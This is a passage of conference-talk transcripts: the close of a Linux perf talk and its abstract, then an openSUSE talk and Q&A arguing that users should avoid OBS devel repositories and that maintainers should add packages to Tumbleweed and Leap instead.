go and look at it if you want. There's also something called IPT, Intel Processor Trace, which is an extremely low level processor tracing feature, and that's also integrated. Like I said, perf is a Swiss army knife; there are a million and one different things it does.
I just focused on the real basic stuff, but eBPF is another cool feature that perf can use. Any other questions? Okay. Well, thank you very much.
The perf tool was introduced with kernel version 2.6.31, but several major releases later, knowing which of its many features to use when, and how to interpret the results, is still challenging for many users. In this talk I will present a brief overview of the performance counters provided by modern x86 hardware, followed by a discussion of the various monitoring capabilities offered by perf, when to use which, and how to begin to interpret the results. This is intended as an introductory talk for those with no significant experience using perf or undertaking performance analysis. An understanding of programming and architecture basics will be helpful. [This talk could be extended to an hour if required; it could also be presented instead as a workshop or as a talk plus an associated workshop]
10.5446/54615 (DOI)
Alright. So, if you don't know me, I'm Richard Brown. I'm the openSUSE Chairman, and I'm going to be talking now about why we should be building our distribution properly, and really why we should be discouraging the use and the building of additional repositories. This presentation is a little bit like a football match: it's a slide deck with two halves. There are going to be things I say that people aren't necessarily going to agree with, that people might not like, and I really need to ask that any questions, any counterpoints, please try and save them for the end. There will be time for questions, and hopefully we'll get to an ending that we all like. But I don't really like football, I much prefer rugby, and there will be blood. There are things here that we really need to fix, problems that have been lingering in the project for ten years, and it's about time we did something about them. And I want to start from the user's perspective. This fellow is possibly one of our typical users. The average typical openSUSE user, as we saw in the slides earlier this week, is normally using Leap, and from the look of things they're quite happy: everything works, no problems whatsoever. But sooner or later they're going to find something else they want to use that machine for, some other bit of software. Maybe they're looking on Reddit, maybe they're reading Hacker News, whatever; some new bit of technology comes about, or they just hear about it for the first time, and they want to install it on their openSUSE machine. When everything works properly, it's a relatively easy case of finding it. For example, using zypper, a nice simple zypper if chromium will find Chromium in our distribution repositories, nice and easy to install from there. Or they use YaST, or of course, if you're a GNOME user, we also have the GNOME Software application store. And this is easy, and this is good, and then it's only one click or one command away to install everything, and everything is fine and simple, and everybody is happy. But what about when the package isn't in our distribution repositories? When it's not there, like here, Elasticsearch: zypper if elasticsearch finds nothing. What do you do next? We haven't got that written down anywhere. We actually have no easy solution: the tools don't tell you anything, there's no simple documentation, we just expect our users to magically know this. And this isn't just a problem that openSUSE has. Talking about SLE, SLE 12 has a fancy new feature set where additional modules are released at a different cadence with a different support level, so SLE customers can get certain software stacks at a faster pace: things like new PHP, advanced systems management tools, et cetera, et cetera. But from a user's perspective, the first time you realize you need to install a module is when you find the package isn't in the main base distribution. And if you use the standard tools, you go to YaST, for example, and there's actually nothing obvious there on even how to find the module. Now, you might be a smart user and realize that modules are delivered by SCC, so you put SCC in the search box and you find nothing. You might look for modules and find nothing. You might look for add-on products, and you find a very nice add-on products window, but actually that's not the one for modules; that's the one for add-on products like HA and Geo.
And it's only if you type in 'registration', which luckily is the one bit that is documented, that you then find the screen for adding extensions to your SLE machine. But then you don't know which one to actually click on, because absolutely nowhere do we have a list of which packages are in which module or in which of these repositories. Now, for openSUSE we share some of these problems, but we have a nice magical tool, the software.opensuse.org search, which lets you find this stuff. But even then we have some very serious problems with it. For example, searching for Elasticsearch, you get one, two, three very clearly different versions, plus a whole bunch of extra modules, when all you really wanted was actually the top one. And in fact the list goes on longer and longer and longer. When you click on that, you get this lovely page, which actually has a little bit of information about the package. It doesn't have a screenshot, because obviously it's a console application and it shouldn't need one. And you don't really get any information about what to install where, apart from this big nasty button saying 'show unstable packages', which you then click on, and you get this warning, which most people ignore, that you shouldn't really be using this, you shouldn't use unofficial repositories, it may be unstable, it may be experimental. And in fact, if you're using a JavaScript blocker, this warning won't even appear, so in many cases these days people don't even know about it. What this then does is go to OBS, look at everything we have in home repositories and devel repositories, and try to do its best at showing what is available there. And every single column on this is wrong. For starters, it's not ordered: it's got home repositories and devel repositories in a pretty much random scattering, it's not alphabetically listed, it's not listed by version number; 1.7.5 there is higher than 1.4.4, but 1.3.5 is listed above it. The architecture column is totally and utterly wrong: devel:languages:python does not only build for ARMv6, it builds for everything. And then at the end you have a one-click install. Now, for this example I've assumed that the user in question is a moderately skilled and experienced openSUSE user, so they probably know how the distribution is put together; they know that a devel project is where we're baking stuff, where developers are working on stuff. So in this example, the user then clicks on a one-click install. And click number one is obviously downloading the one-click install runner from Firefox. Click number two is this window, where it forces the adding of additional repositories to their machine. Now, for starters, the repositories it's adding are totally crazy. This was run on a Tumbleweed machine, my one, and I reproduced it a few times to make sure it wasn't going crazy. You can see there it's adding the Tumbleweed repository again, for reasons I can't explain, and it's adding openSUSE Factory PowerPC twice, two different versions of PowerPC repositories, on an Intel machine. I have no idea why it's doing that whatsoever, but at least it's doing it consistently. Now, on the search we said it was only ARM; when you actually do it you get something totally different, so there's a completely confusing mismatch of what's going on there. At least the next screen is mostly accurate: I only wanted to install Elasticsearch, and it's pulled the package information through, so that is all good and great.
And then you get a screen here sort of warning you, with a nice big red message, that these changes will be made to your system. There's no real notice here about how broken what it's about to do is. If you clicked next here, and if this worked (luckily it doesn't, but if it worked) you would end up with a totally and utterly broken machine. There's no real notice of that; we just let people carry on quite happily, add repositories that will break their machine, add a repository they already have, and install a package that isn't going to work. But we've warned them, we've told them it's all at their own risk. Click number six: of course we require root access to actually install anything. Click number seven: we require accepting the GPG key for the added repository, because it's not built using our standard authorized keys. And click number eight is when the whole thing goes wrong, because the repository which one-click install was absolutely certain was fine doesn't actually work. So then the whole thing crashes and the user doesn't get the package they want. Right now, one-click installs are broken. I've tried this three or four times with different packages; I wanted to have three or four examples. This one ended up being the first one I tried, and it covered everything broken that I could find, so it's one example that covers the whole mess. We really need to get this fixed. If we're going to have one-click installs, they have to install stuff in a sensible way, add the correct repositories, and do their best to shield our users from doing stupid stuff that breaks their machines. Because then they go to the forums, then they go to IRC, then they go to social media and moan that openSUSE is broken. openSUSE is fine. This is what's broken. Now, as I said, in this example I'm assuming the user is moderately skilled and moderately aware of what we're doing. So of course, if you go to OBS, you can find the package in there. This is the devel:languages:python project. Digging around OBS, you can find the list of all of the repositories it's building against, which is a surprisingly big list for a devel project: SLE 11 SP3 and SP4, SLE 12 SP1 and SP2, some weird bleeding factory thing which I have no idea what it is, and a whole range of other bits and pieces. But obviously in this case I'm using Tumbleweed, so you click on Tumbleweed and you get the list of the packages from there. That tiny little link is actually the only thing I'm interested in, because I want the repository URL so that I can go to zypper or to YaST and add the repository manually, which I do. I then do zypper in. And at this point I'm happy, and everything's fine. It works most of the time; assuming the package is actually building properly and is developed relatively well, most things are okay. And then I do a zypper up, and zypper wants to warn me that there are 97 packages from devel:languages:python that it isn't going to touch. That's what happens if I'm on Leap. If I'm on Tumbleweed and I do a zypper dup, it doesn't tell me it's not going to do anything: it tries to find a way to install the entire list of every single package in devel:languages:python.
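As a rough sketch of the manual workflow being described: the repository URL below just follows the usual download.opensuse.org pattern for OBS projects, and elasticsearch stands in for whichever package you were actually after, so treat both as illustrative and check the real link in the OBS web UI.

```sh
# Add the devel project repository by hand
zypper ar -f http://download.opensuse.org/repositories/devel:/languages:/python/openSUSE_Tumbleweed/ devel-python

# Install the one package you actually wanted
zypper in elasticsearch

# ...and this is where the trouble starts
zypper up     # on Leap: warns about the ~97 other packages it will not touch
zypper dup    # on Tumbleweed: happily tries to pull in the whole devel project
```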
So my lovely tested, secure Tumbleweed installation, where we spent time testing and testing and testing to make sure that the whole thing works consistently and comprehensively with everything that goes through openQA, immediately gets invalidated by package after package after package from devel:languages:python. Now, I might be lucky: all 97 of these might work. But the chances are there's going to be at least one that doesn't, and it's going to break some other application elsewhere, make it harder for me to work with my other stuff, and generally cause me problems sooner or later down the road. This is what every Leap and Tumbleweed user has to deal with when a package isn't in the distribution. And that's the best case. That's just not good engineering. But that only scratches the surface. Worst case: we have no quality controls on devel repos. We're not meant to; they're development repos. So build failures happen all the time, everything's moving around, your package might not build anymore. When you're working with more and more devel repos, dependency conflicts appear more and more often, because we have no quality controls in there. There's nothing stopping one devel repo from having one copy of a package and another devel repo having a different copy, so you're going to end up with package conflicts between different repositories that each exist for very sensible reasons. Or the opposite: you end up with unresolvable dependencies, because the devel maintainer tried to do a good job of not duplicating stuff needlessly, so the repo only contains the stuff they're interested in developing, and there's no way of installing it because it requires some other devel repo which isn't at all obvious for the user to find and add. And then even if it works, even if it builds, even if it's dependency sane, the package still might be broken, because that's exactly why it's in a devel project: so we can test it, so we can make sure it works. Packages are meant to break in devel projects; that's why we have them, so they can break before we put them in the distribution. So what I want from everybody and everything is this: devel projects shouldn't be used by users, ever. Because the more I think about this, and about how we could fix it, the more I see that even if we implement every single one of the things I'm going to suggest going forward, we either compromise what the devel projects are meant to be for when it comes to developing stuff, or we end up shipping something broken to users. So in my opinion we should keep devel projects in the role they were designed and intended for, and we need to stop users using them. So how do we fix all of this? There are really two options. One: fix everything. And there's a long list. Starting with OBS: I know there are some features for this already, but it's also a question of how we use OBS; maybe not actually changing how OBS works, but changing the project's use of the build service. Maybe we need a cross-project dependency checker, so we can actually see: okay, do this devel repo and that devel repo work together, is everything going to be sane, is it going to work? We've had issues in the past with projects publishing broken packages, or packages failing to build while the repo is still being published and the entire thing no longer being consistent.
So maybe we need some way of freezing the publishing of a project when there's a build failure in that repo. Or, and/or, maybe we need a new type of repo. We have the main official repositories, we have home repos for everybody to do anything they want, and we have devel repos for building the distributions. Maybe we need the concept of a stable repo, where we can say: okay, this stuff has at least been checked in some sense, it's been built properly, users can use stable. Maybe that's what we need. Even if we have that, zypper, in order to support these kinds of concepts, may need to get rid of the 'will not be installed' warnings. The vendor concept is one of our greatest things, but at the same time it causes an awful lot of confusion, so maybe we need to smooth it out, tidy it up. Maybe, for example, the stable repos would be built under the openSUSE key. Maybe not, because coolo is shaking his head at me already. And of course, improving the search functionality, both on the software.opensuse.org search and the OBS web search, but also actually baking that ability to search into our tools, into YaST, into zypper. So if you run a command, maybe there should be a zypper cnf, command-not-found, so zypper can tell you: hey, it's in this repository over there in the build service, add it from there. There's already talk about doing that for SLE modules. It's something we desperately need, so users can find out where to get the stuff they want. And adding that to YaST too, of course; if we're doing it in zypper, we really should do it there as well. On the one-click install: please, we just need to fix everything there. It needs to stop adding insane repositories to people's machines. It shouldn't be doing stuff like PowerPC for Intel; that's never going to work. And it isn't a one-click install: even when it works best, it's still nine clicks. So it's a nine-plus click install, and we need to stop pretending it's the fastest way of doing everything. And on the software.opensuse.org search: this has already started moving, because we had the workshop on Thursday, so we already have people looking at software.opensuse.org, tidying it up, simplifying it. We really should be removing home repos and devel repos from it, or making them incredibly hard to find and making it incredibly obvious that you should be using the distribution first. Or we could just give up on packaging. There are these wonderful things called Snappy and Flatpak. In theory, for some of these issues, for example installing applications on top of Leap, there is some benefit there. A Leap user wants the latest shiny version of LibreOffice; it's a heck of a lot easier for us to put it in a Flatpak with the GNOME runtime and all of that and have it installed. But as I thought about this while putting the slide together: it's always going to be an edge case if we use it properly. Because you don't want to get to the point where everything in your distribution, everything user-facing at least, is in some nasty containerized beast, and then you have to explain to users why your minimal install is 40 gigabytes for 300 packages. And then there's an OpenSSL update, and every one of those packages has to be updated, and suddenly it's 40 gigabytes just to patch your machine. That's not the best way of doing things. But all of this stuff put together is a huge amount of work. Maybe we should go down this road; we should try and fix as many of these things as we can. But there is a shortcut.
And, you know, during the keynote we said, we British people love our swearing: the easy option is to add your bloody packages to the distribution. Once they're there, they're tested, they're integrated; we have the tools, we have the techniques, we have the policies. This is how we should be getting software to our users. Tumbleweed and Leap should have as many packages as we can support, for all of our users. We need to be doing that better. Even if we improve the other stuff, we still need to be doing this a heck of a lot more. And the best thing users can do to help us? Well, they can help by becoming maintainers, they can learn, or they can bug our maintainers to try and get stuff in there. The biggest bit of feedback I always hear is: oh, I didn't know anybody was using it, I didn't know somebody wanted that package. So please, users, if you're interested in a package, go to the openSUSE Factory mailing list, try and find people to package stuff, try and learn to help. We need to get more packages in there, because that is the best, smoothest and safest way of getting software into the hands of people. So now, less of the user story, more of the developer story. Why is this such a hard thing? Where is the problem, really? Well, 'putting packages into the distribution is too hard'. Everybody says that. Even me, I've said it as well, and it's sometimes true: there is some truth to it, it's not trivial putting something into a distribution. But when you compare it to what we're doing right now, it ends up actually being easier than the mess we're producing with our current way of doing things. Because if you think of, for example, the Factory development process, this is how a package goes into Factory and ends up in Tumbleweed right now. Every single one of these steps was designed because our developers are lazy, and we want to make the next step less work and have less work to do in the future. The first submission is reviewed by a whole bunch of bots, because we don't want to waste our time reviewing for trivial issues. We pre-integration test everything in staging and openQA, because we don't want to be bothered with picking apart a whole mess of complicated distribution mangling, of package A conflicting with package B and crashing, when it ends up in the distribution at the end. We only review what we have to, when we have to, with policies that make sense, so Factory can be kept clean, consistent, and moving as fast as it can. And then we QA test everything as much as possible, as often as possible, so we have as few users as possible moaning about stuff being broken. All of this is actually there to save us work. When we put something in a devel repo, we skip every bit of this, so every problem this process was designed to solve is totally and utterly bypassed. And, in fact, it produces more problems. Because the role of the devel project isn't just a case of, oh, it's a nice convenient place to throw a few things before they go into Factory. Every upstream is different: KDE has different ways of doing things, GNOME has different ways of doing things, so the upstreams all have different requirements, and we need to be agile enough to cope with that, build things slightly differently, have different processes. And our teams, well, most of our teams are volunteers now.
We want to make sure that those teams are using processes and techniques that make sense to them and fit their needs and how much time they can volunteer. This is why we have the devel project concept: so we can have lots of different teams in the openSUSE project working at their own pace in their own way, hopefully somewhat self-moderating, making sure that the part they know about is very, very good, and then they throw it towards Factory, hit that process, and we pull the whole thing together. When you just do devel projects on their own, you're building a castle on shifting sands. Your project is moving at the pace you know your project is moving at, but you don't know how fast Factory is moving. You don't know how fast that other project is moving that's going to change something in Factory that's going to change your thing. You might have everything working wonderfully in your devel project, you might be perfect, but is everybody else? And if you're working in isolation, you're just going to cause yourself more hassle in the long run when you do eventually put it into Factory, you do eventually submit it to a distribution, and then it all goes horribly, horribly wrong. This is the kind of stuff that came up in the conversation with the KDE neon guys earlier in the week. They're doing something very similar to a traditional openSUSE devel project. Everything's fine for them now, but they're going to have to rebase against the new Ubuntu version in the future, and that's going to be a huge undertaking. The reason we have the Factory process, the reason we do Tumbleweed, is so this can be done in small chunks at our own pace, in our own time, using our own processes, so you avoid big calamitous messes as a developer where you have to spend weeks and weeks picking apart the mess. So please stop misusing devel projects. We should be using devel projects to develop for our distributions. We don't support 13.1 anymore; Evergreen maintains what it can, but there should be no expectation for our users to have the shiny latest new Python on 13.1. 13.2 is going to be end of life in less than a year, so why are we still building the latest Python on top of it? And these are just the Python modules in devel:languages:python; the project where Python itself is built is even worse than this, I couldn't fit it all on the screen. So please, build only what you need in the devel project. The one thing you should always have is Factory. The next is Leap 42.2, which we're developing now, since there is the possibility that some things might want to skip ahead or move from a devel project straight into there; and then the next SLE 12 service pack. Those are the only three things that should be built in a devel project, because they're the only three targets where something might end up being sent as a submit request, the only things we're building stuff for. Everything else is not suitable for a devel repo. It's more work for you to maintain it, it's more work for you to fix it when it goes wrong, and it's more work for OBS to build it. Why are we wasting so much time and so much effort on something that ends up being a bad thing for our users anyway? This is belabouring the point a little bit, but Tumbleweed today will become Leap 43 and SLE 13 in the future.
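The "build only what you need" advice translates directly into the devel project's meta in OBS; a minimal sketch of what a trimmed-down repository list might look like (project and repository names are placeholders, and the Leap/SLE targets only belong there where that project actually submits to them):

    osc meta prj -e devel:languages:example    # opens the project meta in $EDITOR
    # keep only repositories that track real submit targets, e.g.:
    #   <repository name="openSUSE_Factory">
    #     <path project="openSUSE:Factory" repository="standard"/>
    #     <arch>x86_64</arch>
    #   </repository>
    #   <repository name="openSUSE_Leap_42.2">
    #     <path project="openSUSE:Leap:42.2" repository="standard"/>
    #     <arch>x86_64</arch>
    #   </repository>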
If we follow this process now, we move along at the pace of Tumbleweed, which is the pace of contribution, so we can set the pace that suits us with our time as volunteers or as busy SUSE employees, and we can still avoid chaos in the future. Leap benefits from that, SLE benefits from that; it's way easier to take packages that have been in Tumbleweed for a couple of weeks and then shove them into Leap. Keeping packages only in a devel repo hides major integration issues, and then you have a huge and hard time getting everything working. Now, I know I seem to be asking everybody to do an awful lot more work, but you're not alone. We know what we're doing with this, we've been doing it for a very long time, we have the experts, we have the community around it. opensuse-factory is where you should be discussing adding new packages and removing packages. If you're having issues actually building a package, opensuse-packaging is where you can get help on the nitty-gritty of that. We have those lists, and obviously the openSUSE release team of Ludwig, Dominique and Max, keeping all of this clean and tidy in Leap and in Tumbleweed. Now, every time I talk to anybody about this, I hear the same thing: our policies are too strict. But they exist for damn good reasons. They've all come from the fact that we've been doing this now for ten years or longer, and every single one of those rules exists for either a good engineering reason or a good community reason. The ones I hear most people object to are the ones that are there because of the community. As developers, it's probably quite easy for us: we look at a rule and say, I can see how that makes the code higher quality, the policy makes sense. But we're an open source project. And if we're not doing stuff like making sure that our changelogs are easy to read and easily parsable, and that our spec files are actually sane, so somebody else someday might be able to come over, pick it up, read it, use it and make it better, then we're missing the point; those are in some respects the more important policies, because they're the ones that actually make openSUSE sustainable in the long term. So yes, our policies do exist for a reason. Sometimes you might not get the logic behind them, but they're not crazy. They're not strict just for the sake of being strict; they're strict for the sake of making it easier in the long term to keep the community moving forward. And ultimately they share an awful lot in common with the ones used internally at SUSE for SLE, for the enterprise. That's a very, very good quality distribution. They know what they're doing, we know what we're doing, and we work very well with that. But no openSUSE policy is set in stone. We can discuss them, we can adapt them; if there is a sensible reason to do so, let's talk about it. Now, slides not working... there we go. I want to see as much as we can in the distribution. But being a realist, I know we can't put everything in there. Legal reasons, engineering reasons, and sometimes practical reasons of just wanting to offer something in a slightly different way mean that we can't put everything in there. We need to get better than what we've been doing, but sometimes additional repos have to be done, right? And the way SUSE builds SLE is a model we really should be considering for some of our stuff.
Because they generally don't, with the exception of Package Hub, build an add-on in a separate project and just hope it magically works. Inside the internal SUSE Build Service there is one big SLE project, which is very similar to our big Factory project. Everything is built there and tested there and consistently made sure to work together, all cut from the same cloth, and then the products are separated out and distributed as different repositories. This works very, very well, because you make sure everything is built together and designed to work together. It's much more likely that a customer can then add any combination of those add-ons or modules and the thing is going to work. It's a heck of a lot easier to test together. And also, because all that carving up takes a little bit of work, there's a little bit of effort involved in separating this stuff, it makes sure that each extension or module or add-on is as small as it needs to be and no bigger. Which is a very good thing from an engineering perspective, and it also makes sure they only move when they need to; the fewer times you move it, the fewer times it breaks. So I think when openSUSE comes to thinking about add-ons, we really should only be thinking about them when there's no other choice. It should be in the distribution by default whenever we can do it. It's less complicated, it's easier for our users, and it's easier for us to maintain in the long run. So for Tumbleweed, my personal feeling is we should start with the concept of no add-ons. There shouldn't be any need to add an additional repo for Tumbleweed, because the whole thing is always rolling: we can always submit something new, we can always change it, so why bother? The exceptions, of course, being proprietary kernel modules, which are potentially technically and legally an issue to put in there, and obviously sister projects like Packman, where we can't do that either. But for Leap, yes, I think there is possibly a case for stable projects. Users might want a stable version of something newer than what's been released. That's really the only use case, I think, where we should be spending lots of effort thinking about this: backporting new versions of stuff for Leap users. And if we do do this, it should be a small, tightly defined repo. Just what the user needs to get what the user wants. Not every single library, not every single module, just the bits that are needed to make the user happy. And, of course, it should only be built for Leap, because 13.1 and 13.2 are both ending support soon, and SLE already has Package Hub. From a conceptual point of view, I see it working something like this, maybe: there's a devel project, the new Python has already been submitted into Tumbleweed, and then we backport it, take it out again, and have it as a stable repository for Leap. Because then, from a user's perspective, everything becomes easier again. They have Leap, they add a repo, and because that repo contains only what it needs to get the thing into the hands of the users, a zypper dup should be a perfectly sane and sensible way of updating it. So, in theory, that freeze of devel projects means they're only built for development, again, as they should be, so we're not wasting our time worrying about build failures on architectures we don't support or build failures against distributions we don't support.
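From the user side, consuming such a stable repo would be nothing more exotic than this sketch (the repository URL and alias are hypothetical; no such repo exists as of this talk):

    # add the hypothetical stable repo for Leap and switch only its packages over to it
    sudo zypper addrepo --refresh \
        https://download.opensuse.org/repositories/stable:/example/openSUSE_Leap_42.2/ stable-example
    sudo zypper dup --from stable-example   # pull in exactly what that repo ships, nothing more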
It gives users a nice, clear, easy way of saying: okay, that's a stable repo, I can use that. It makes it clear to users which ones are safe. It tidies up a lot of mess. And it should be a heck of a lot easier for us to test, especially because I want to put everything in openQA. But this isn't a perfect concept; there are still problems. Because how do we define small and tiny? How small is it really? We haven't got any policies for that, we haven't got any concept of that; we need to think about that and be exactly sure how we define what is narrow. How do we review it? How do we make sure we can actually do this sustainably for several years? How do we solve dependencies between repos? How do we make sure that someone adding stable A and stable B doesn't get a clash between them? How do we handle upgrades? How do we handle versions of Leap that change? How do we handle versions of the stable repository that change? Do we end up with maintenance? Do we end up with testing? And the more I think about these problems, the more I go back to my earlier point: adding packages to the distribution is actually easier than figuring this mess out. But this is the mess we have to figure out if additional repositories are going to be sensibly usable by users in the long term. So to recap: maintainers, please put your packages in the distro. Users, please stop using devel projects, because they're going to break on you sooner or later. Stable repositories might be a good idea, but it's going to take a heck of a lot of work, a lot of discussion, a lot of planning. But if we want to keep that concept of additional repositories where people can Lego-brick-build their distro, let's collectively get together and do it. We can't carry on like this. Questions? Hey, Stanislav. Can somebody get him a microphone? Thank you. Well, ten years ago when we created the devel repositories, we were thinking about the idea that, for example, if you want the latest GIMP, you don't have to install Factory, you can just subscribe to the repository. But now it looks like a bad idea. I think we should drop most of the devel repositories and keep one devel repository, like Staging, and make some reasonable exceptions like GNOME:Next or so. Because in fact there is no reason to subscribe and live with packages from a devel repository, because it can break anything. Yeah, you're right, it can break anything. I'm actually really thinking more of Leap users: we're taking the version of something in a devel repository, before it's even got to Factory, and then breaking everything there. So one reason there is this idea of flatpaks and whatever. One specific example that I'm not seeing your proposal solving: suppose you want to support HTTP/2. What you need in order to be really HTTP/2 compliant is a more recent version of OpenSSL than almost any stable distribution is shipping, which is 1.0.2. Most modern distributions do have that, but usually on servers you're running stable distributions for a reason. So how are you going to solve that? Because OpenSSL is a very fundamental library. Now, let's say nginx compiles inside a flatpak with its own OpenSSL; that's easy, but of course that's exactly what you want to avoid. So how are you going to solve that? Well, if there really is a use case for something like that, and I think there is: with Leap we don't follow the traditional rule that everything must be frozen after the point of release.
We can do version upgrades in the maintenance model. Maybe we shouldn't be doing that for OpenSSL, but we do have that flexibility. Plus, with an annual release cycle, it's not actually that far away to the next Leap 42.x where that could be done. And in the case of Tumbleweed it moves right through; it's already there. In fact that example, I think, was put in a few months ago, and it's going to be in Leap 42.2 in November. So yeah, I think with the model we've already got, we don't brush into that issue too much when we do the backports, or flatpaks are the solution to that. So I'm in full agreement with your analysis and with part of your solution, like pushing more packages to Tumbleweed, which is definitely something we should do. The only problem with that is that for a more or less long period of time we are keeping Leap users out of the loop. If, for instance, we push a package to Tumbleweed one month after 42.2 is released, we still have to handle users on Leap. And I'm wondering if we should try to expand or tune the concept of Package Hub, meaning having not only backports but new packages available as a maintenance project for Leap, so that when maintainers push packages to Tumbleweed, they can also push the same packages, built stable, to this Package-Hub-for-Leap repo. It wouldn't move, we could do automatic checks on it, and people would always be able to revert to this version if a new version comes out. A bit like an update repo, but for new packages, and not just for new versions of packages already shipped in Leap, which is, I would say, another problem. I totally agree with you. That's actually one of the reasons why I put these up here: if we do this in this model, that would enable that. But I'd love Scott's opinion on that, just to put him on the spot. Actually, I'm glad you brought this slide up, because I had a correction for you. Instead of building against SLE 12 SPx, if you want to build packages for SLE, what we recommend now is to build against openSUSE:Backports:SLE-12. Because, for basically many of the same reasons that Richard talked about why it makes sense to get more things into Factory and into Tumbleweed, as we've been investigating the best ways to deliver packages for our enterprise users from OBS, we've found it's much better to build your packages against this Backports project for SLE 12. So that should actually say Backports there. Okay. Another comment I had: as I was doing a bit of investigation, I also happened to look at the Python project, and Richard and I didn't even talk about his presentation, yet I presented something quite similar in the talk I did about Backports yesterday, some of the same concepts. But one thing you didn't mention where pushing things into Factory makes it easier for packagers: I believe, from what I've seen in the Build Service, that in the Python project they're doing source copies or source links from other devel projects because of dependencies they have, and those packages they're source-copying in are not in Tumbleweed. So they need to maintain a copy within their own project just so they can build their package. It would be much easier for them to build if those were just in Tumbleweed to begin with; and not only that, because those dependent packages aren't in Tumbleweed, it blocks them from releasing their own package into Tumbleweed.
So the more we work on pushing this stuff into Factory and Tumbleweed, the easier it should be for all of us who are maintaining packages, because we can more easily build upon each other's work. I totally agree. Actually, we discussed this when we prepared Tumbleweed itself, how to work with the devel projects, and one of the items that was never fixed was that everything in a devel project should be in Tumbleweed, or linked from somewhere else, to support building only for the other distributions; but it was never finished, so it's still standing there like this. From my point of view, yeah, we should simply build against Factory, and for new packages and new versions we still have working maintenance projects, and we accept both of those, either version updates or new packages, into the distribution. So it's just that people never actually bothered to request updates or new packages in Leap, or they don't know they could actually request it. I agree. Adrian has a question, though. I disagree a bit that you should not build against stable distributions, because from my point of view this rules out getting upstream people working directly with our next distributions, because they are interested first of all in the stable distributions, and Tumbleweed and Factory and Backports are just an add-on for them. They focus mostly on getting their users satisfied, and their users usually are on a stable version. Okay, we could work in one project, then submit to a devel project and then submit onwards, but they usually have one workplace, and you just ignore everything else when you submit it onwards. You have one workplace where you look at things and fix your stuff, and I don't think this is working. I mean, lately I'm trying to put some packages into Factory again, and I get the packages working within a day, and it takes more than a month to get something into Factory; and an upstream guy who focuses on the stable distributions for their users would just remove the Factory and Tumbleweed repos. But then you end up with an upstream guy targeting, for example, Leap 42.1, which has approximately one year of support left. And then, okay, we could push that out as a maintenance update, but it's not going to benefit from any of this testing, any of these steps, any of the reviews. We really want to have upstream people working with Tumbleweed first, because that can keep moving all the time. My point was, I think you are separating these groups unnecessarily. Why not work together with upstream people also on the next distribution's packages? But if you say these devel projects must not build for stable distributions, you are ruling them out. You are ruling out an entire large group of developers in the Build Service. But then we're going to have a whole bunch of duplication, because they might have it working on Leap 42.1, it might not work on Factory, and who is going to take care of that second part? We get ourselves into those messes where we have a whole bunch of stuff that works on our older distros and then we can't get the thing into Factory, and then it ends up being dropped from Factory, which is how we have weird and wonderful messes like now, where Factory is missing stuff that's in Leap and Factory is missing stuff that's in SLE. We need to stop that. Okay, but you're only seeing it from the point of view of the next distributions. The other groups are looking at it exactly from the other direction. They're looking at it for their users, for their stable distributions. And you say you don't want them?
We have an upstream here who has a comment, so let's see what KDE has to say on this. No pressure, Martin. So I think upstreams are not interested in providing software for distributions, because there are too many distributions. If they try, they fail. That's exactly what we see. Like in the ownCloud case, they did actually do packages, and people were pissed at them because they did bad packages, just like with openSUSE, and I think that's what we see everywhere. Upstream developers don't want to meddle with 20 different distributions, and that's why there are things like Flatpak. I think that's the way to go for an upstream project trying to get software onto a stable distribution if they want to. They need to stop doing packages if they do that, and I think most upstreams just don't care, because they cannot keep up with it. And if they do care and they only want to work on one of our distributions, I'd much rather they work on Tumbleweed, because that's the one that is the next one. Lars? Oh, Coolo first. She gave me the microphone without knowing your rules. So I agree completely with Adrian here. Basically you're ignoring where the users are, because, just as Martin says, upstreams don't care about distributions, they care about users. The ownCloud client in OBS exists not because of Leap or Tumbleweed, it exists because of their ownCloud users. That's who they have the package for, and that's why the package is so bad: because they'd rather deploy a workaround and have yet another distribution building than have a clean package that would be acceptable for the distribution as-is. And I would like to ask you: what software did you use to create your blog post? Jekyll. Jekyll. Is this in a distribution? Not yet. So did you ask anyone to submit it to a distribution? Yes. Did he do that? He said he will. Did you wait for him to finish including it in a distribution? He was a little busy helping set the conference up. So basically you're saying no. No, I'm saying it should be in the distribution, and that's what I'm going to continue pushing for. But you already have it now, right? Yes, but I don't necessarily mind that my blog might break at any time. But that's not the point I was trying to make. The point is that users are very, very happy that there are home projects building packages that are not necessarily yet in the distribution. But that is a lame excuse. We should not be doing that, we shouldn't accept that as justifiable; we should be doing better than that. Because ultimately it will break, and then who's going to fix it for that user? I can fix it for myself when it comes to Jekyll, I can just spend the time fixing my damn package. Do we expect all of our users to do that? The problem is, how many of those steps that are currently on screen apply to Jekyll? No pre-integration testing, no QA afterwards, almost nothing of the Factory process. So basically the gain of having it submitted is really having someone do a manual review and yell at you because you got something wrong. You're focusing on the engineering part. You're forgetting all of that stuff with software.opensuse.org and zypper, where it's a nightmare getting the damn thing in the first place. But Torsten has something to say. Yes, Coolo, if you say that users need a stable version of a devel project, that's wrong. Because, as Richard said, if you add a devel project on your distribution, Leap or an older one, and run zypper dup, most of the time your installation is broken afterwards.
So adding the stable distributions as build targets to devel projects is not the right way to go. But creating stable repos and then adding the old stable distributions to those to build against, that's the right way to go. Could you pass it along? He's been raising his hand. Yes. Sorry. So I have a couple of things. First of all, you mentioned that one-click install problem we have. So you say our users should be able to easily install packages from devel projects, I see; how does that fit with your second answer, that users should not use packages from devel projects? Okay, good question. If we are going to offer some kind of stable repository, if we are going to support some workflow where we do expect users to use additional repositories, they should have some easy way of doing it. Right now I think we should stop using devel projects entirely; if we do that, then one-click install becomes meaningless and we don't need it. If we instead put in something like stable repositories, then something like one-click install becomes important and we have to fix it. So you are just inventing a new Staging, or rather stable repositories, right? Yes. Okay, no comment on that; I just want to know who's doing the work. But that's another point. On the other hand, I totally agree with Coolo and Adrian. I try to keep track of all the 400 or 500 packages in Education, and I have people from upstream working with me, luckily; at least ten of them are working on their code in Education. Most of them just care about the Debian packages or some Fedora packages. So what should I do? Should I try to convince them to push all that stuff to Tumbleweed? They would say: how many users inside the education world are using Tumbleweed? And I can tell you from my own experience: during summertime, when all the schools are having vacation, that's the time when teachers update their systems. During the whole year you see nothing, but during summertime all the teachers update their school servers and school clients to the latest and greatest version, which is not Tumbleweed, because they have students and they have to rely on a stable distribution. So the best case I see is that they are using Leap right now. But to be honest, they still run openSUSE 13.1 and they still run openSUSE 11.4, just to give you an idea. And that's the reason why we in the Education project, for example, still support such old distributions. And I can fully understand them, because on one side, as a developer, I want to have the latest and greatest stuff; on the other side, I have to agree with them: they have no time to work on that all the time, they have just a limited amount of time, and they are happy if their system is stable enough to run their daily workload. And they are just happy that they can use our devel project, because there they can even find some up-to-date packages they want to use in their daily workflow. But how is it going to work when that package is broken? How is it going to work when the devel 